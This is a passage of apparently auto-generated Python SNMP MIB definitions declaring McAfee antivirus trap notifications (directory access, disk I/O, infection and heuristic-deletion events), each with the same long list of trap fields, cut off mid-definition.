mcafee_EVENT_DIR_ACCESS_ERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1042)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_WRITE_PROTECT_ERR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1043)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MEDIA_NOT_FOUND_ERR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1044)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCAN_ITEM_INVALID = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1045)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_FILE_IO_ERRORS = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1046)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_DISK_IO_ERR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1047)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_GEN_SYSTEM_ERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1048)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_INTERNAL_APP_ERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1049)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_INFECTION_PASSWORD_PROTECTED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1050)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_NOT_SCANNED_PASSWORD = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1051)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_INFECTED_BINDARY = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1052)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_INFECTED_HEURISTICS = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1053)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_DELETED_HEURISTICS = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1054)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", 